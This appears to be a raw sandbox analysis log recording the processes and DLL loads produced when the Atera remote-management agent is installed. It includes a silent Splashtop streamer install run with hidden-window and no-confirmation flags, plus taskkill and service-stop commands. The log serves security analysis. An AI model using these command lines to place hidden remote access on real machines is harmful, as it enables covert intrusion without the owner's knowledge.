                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: C:\Windows\Temp\unpack\PreVerCheck.exe "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM SRServer.exe /T
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Process created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\SplashtopStreamer.exe Process created: C:\Windows\Temp\unpack\PreVerCheck.exe "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC}
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T"
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T"
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM SRServer.exe /T
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
